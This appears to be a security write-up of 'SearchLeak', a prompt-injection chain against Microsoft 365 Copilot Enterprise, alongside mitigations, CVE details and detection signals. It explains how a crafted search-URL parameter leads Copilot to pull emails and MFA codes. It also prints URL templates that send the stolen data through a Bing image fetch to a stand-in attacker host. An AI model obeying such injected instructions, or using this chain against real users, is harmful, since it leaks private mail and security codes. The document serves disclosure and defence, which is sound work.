How a single crafted Microsoft link turned Copilot into a one-click email and MFA code thief

The Context

Microsoft 365 Copilot Enterprise is the premium AI assistant tier embedded across Outlook, Teams, SharePoint, and OneDrive. Unlike a general-purpose chatbot, it has direct access to everything in a user's Microsoft 365 account through Microsoft Graph, which acts as a single gateway to email, calendar, files, and meetings. That broad access is the product's core value proposition: ask Copilot to summarize last week's emails or find a contract in SharePoint, and it can do it instantly.

As of early 2026, approximately 15 million paid seats were active. The vulnerability affected the Enterprise tier specifically because tenant-wide data indexing—the feature that makes Copilot so useful—is limited to that plan.

The Attack, Phase by Phase

Phase 1: Crafting the Weapon Link

The attacker constructs a URL targeting the Microsoft 365 Copilot Enterprise Search endpoint. The address begins with a legitimate Microsoft domain, m365.cloud.microsoft/search/, and includes a query parameter called q. In normal use, q holds a search term. In SearchLeak, it holds a multi-step instruction: search the victim's inbox, find a specific email, extract its subject line or any security codes it contains, replace spaces with underscores, and embed the result inside an image link pointing to Bing's image-search service.

Because the final URL resolves to a real Microsoft domain, anti-phishing filters see nothing suspicious. The attacker sends the link via email, Slack, Teams, or any other channel.

Phase 2: P2P Injection and Data Retrieval

The victim clicks the link. Copilot Enterprise Search passes the q parameter directly to its AI engine as an executable instruction, not a search string. Copilot, operating with the full permissions of the authenticated user, queries Microsoft Graph and retrieves the requested data from the victim's mailbox, calendar, SharePoint, and OneDrive. It then constructs a response that embeds the stolen content inside an image URL pointing to Bing.

The victim sees only Copilot appearing to think. There is no prompt, no warning, no visible data movement.

Phase 3: Race Condition and CSP Bypass via Bing SSRF

As Copilot streams its response to the browser, an image tag containing the stolen data fires during the render phase, before Microsoft's output sanitizer finishes its post-processing pass. The browser sends a request to Bing's image-search endpoint, which is already on the page's allowlist of trusted domains.

Here is where the third flaw completes the chain. Bing's image-search service performs a server-side fetch of the image URL it receives to analyze the image. That fetch originates from Bing's own infrastructure, not the victim's browser. The browser's Content Security Policy, which would have blocked a direct request to an attacker's server, is entirely irrelevant. The stolen data, encoded in the URL path, arrives in the attacker's server logs. The entire sequence completes in seconds.

Phase 4: Patch and Disclosure

Varonis Threat Labs researcher Dolev Taler privately disclosed the vulnerability to Microsoft's Security Response Center in early 2026. Microsoft confirmed the issue, assigned CVE-2026-42824 with a Critical severity rating on June 4, 2026, and deployed a server-side backend fix to all Copilot Enterprise tenants before public disclosure. No customer action was required. Varonis published the full technical details on June 15, 2026.

What Made This Possible

1. The AI engine trusted URL parameters as instructions. The q parameter was passed directly to the AI engine without being treated as plain text. The system had no mechanism to distinguish between a user typing a search term and a URL delivering an executable instruction.

2. The sanitizer ran too late. Microsoft's output sanitizer was designed to strip malicious HTML from Copilot's responses. But because Copilot streams output to the browser as it generates it, the image tag fired and the browser acted on it before the sanitizer completed its pass. A security control that runs after the damage is done provides no protection.

3. A trusted Microsoft service completed the exfiltration path. The Content Security Policy correctly blocked direct requests to unknown servers. But Bing was allowlisted. The attacker did not need to break through the CSP; they routed data through a service the policy already trusted.

Each flaw alone was insufficient. The P2P injection without the race condition produces malicious HTML that gets neutralized. The race condition without the SSRF produces a request the CSP blocks. The SSRF without the P2P injection produces nothing. Chaining them created a path that none of the individual controls was designed to stop.

What Should Have Stopped This

No single defense would have neutralized SearchLeak; the attack succeeded precisely because it threaded through three independent control gaps simultaneously.

• Least-privilege data scoping for AI tools. If Copilot's Graph access had been scoped to only the data types a user's role genuinely requires, the attacker's instruction could only retrieve what was in scope. Scoping access limits what any single compromised session can expose.
• Input validation at the URL parameter layer. Treating the q parameter as a sanitized search string rather than a raw instruction passed to an AI engine would have prevented the P2P injection entirely. This is a standard web security practice applied to a new surface.
• Synchronous sanitization before render. If the output sanitizer ran before the browser received any streamed content, the race condition would have no window to exploit. Streaming performance and security sanitization were in tension here, and performance won by default.

The Takeaway

SearchLeak is not an isolated bug. It is the third Copilot prompt-injection disclosure in roughly six months. The predecessor, Reprompt (patched January 2026), demonstrated the same one-click technique against Copilot Personal. EchoLeak (CVE-2025-32711, CVSS 9.3) required no user click at all, embedding instructions in documents Copilot processed automatically. Each attack bypassed protections the previous patch was supposed to establish.

The meta-pattern across all three: systems fail when they trust a boundary the attacker controls. Copilot trusted a URL parameter it should have sanitized. The Axios supply chain attack trusted package metadata it should have scrutinized. The Stryker Intune case involved a privileged management tool weaponized against the organization it was built to protect. In each case, a system designed to act on instructions with broad authority had no reliable mechanism to verify whether those instructions came from a legitimate source.

Patching individual vulnerabilities in AI systems is insufficient as long as the structural condition remains: an AI assistant with broad data access that treats certain inputs as trusted instructions. Until that condition changes, the attack surface does not shrink with each patch. It shifts.

Pattern to remember: An AI tool's data access scope is also its maximum exfiltration radius, and any input path that reaches the AI engine without sanitization is a potential trigger for that exfiltration.

What changed: AI assistants have introduced a new class of exfiltration proxy—one that uses the tool's own legitimate permissions and trusted infrastructure to move data, making the attack invisible to controls that look for unauthorized access.

The Technical Mechanism

SearchLeak chains three distinct weaknesses, none of which is independently exploitable in a meaningful way.

Stage 1: Parameter-to-Prompt (P2P) injection. The Microsoft 365 Copilot Enterprise Search endpoint at https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=PROMPT passes the q URL parameter directly to Copilot's large language model (LLM) orchestration layer as an executable instruction. Unlike standard Copilot chat, Enterprise Search is wired to Microsoft Graph with tenant-wide indexing, giving the AI engine read access to the authenticated user's mailbox, calendar, SharePoint, and OneDrive. An attacker-controlled q value can instruct Copilot to retrieve specific content and embed it in the response in attacker-specified formats.

Stage 2: HTML rendering race condition. Copilot streams its response to the browser incrementally. The attacker's prompt instructs Copilot to include an <img> tag in its output, with stolen data encoded in the src URL. Because the <img> tag is rendered by the browser during the streaming phase, before Microsoft's post-processing sanitizer completes its pass over the full response, the browser issues the image request before the malicious HTML can be neutralized. The sanitizer's design assumes it will run before the browser acts on the content; streaming breaks that assumption.

Stage 3: CSP bypass via Bing SSRF. The Copilot Enterprise Search page's Content Security Policy (CSP) allowlists *.bing.com but blocks arbitrary external domains. The attacker routes the exfiltration through Bing's bing.com/images/searchbyimage?cbir=sbi&imgurl=ATTACKER_URL endpoint. When Bing's image-search service receives this request, its backend performs a server-side HTTP fetch of the imgurl value to analyze the image. This fetch originates from Bing's own infrastructure, not the victim's browser, rendering the CSP entirely irrelevant. Stolen data encoded in the imgurl path arrives in the attacker's server access logs.

The attack requires no plugins, no elevated permissions, no second user interaction, and no malicious content hosted on the victim's tenant. The entire chain is triggered by a single URL click.

CVE and Advisories

• CVE-2026-42824: M365 Copilot Information Disclosure Vulnerability. Assigned by Microsoft as CNA on June 4, 2026. Classified as CWE-77 (Improper Neutralization of Special Elements used in a Command, "Command Injection"). Impact: Information Disclosure. Max Severity: Critical. CVSS 3.1 base score: 6.5 (Medium) per Microsoft; 7.5 per the National Vulnerability Database (NVD). CVSS vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N. Fully mitigated server-side; no customer action required.

For context, the predecessor vulnerability EchoLeak (CVE-2025-32711, CVSS 9.3, disclosed by Aim Security in 2025) was a zero-click variant of the same class, embedding prompt injections in documents Copilot processed automatically.

MITRE ATT&CK Mapping

Indicators of Compromise

Detection of SearchLeak exploitation is structurally difficult. From the victim's browser, the exfiltration request appears as a routine image load from a Bing endpoint. From the network perimeter, the outbound request goes to bing.com, a trusted Microsoft domain, with no anomalous destination.

Potential detection signals include:

• Unusual Copilot Enterprise Search activity in Microsoft 365 audit logs, specifically search sessions initiated from external links rather than the Copilot interface directly
• Microsoft Graph API calls for mail or file content immediately following a Copilot Enterprise Search session, particularly for content types inconsistent with the user's normal Copilot usage patterns
• Outbound requests to bing.com/images/searchbyimage with imgurl parameters pointing to non-Microsoft domains, visible in proxy or network flow logs

Microsoft confirmed no evidence of in-the-wild exploitation prior to the patch deployment. Varonis disclosed only a proof-of-concept; no weaponized tooling has been publicly identified.

Attribution

SearchLeak was discovered and responsibly disclosed by Varonis Threat Labs researcher Dolev Taler, who is credited in Microsoft's MSRC advisory. The vulnerability is a design-level flaw in Microsoft's product. No threat actor, nation-state group, or criminal organization has been linked to exploitation of this vulnerability. Microsoft confirmed no customers were affected by malicious use prior to patching.

Primary Sources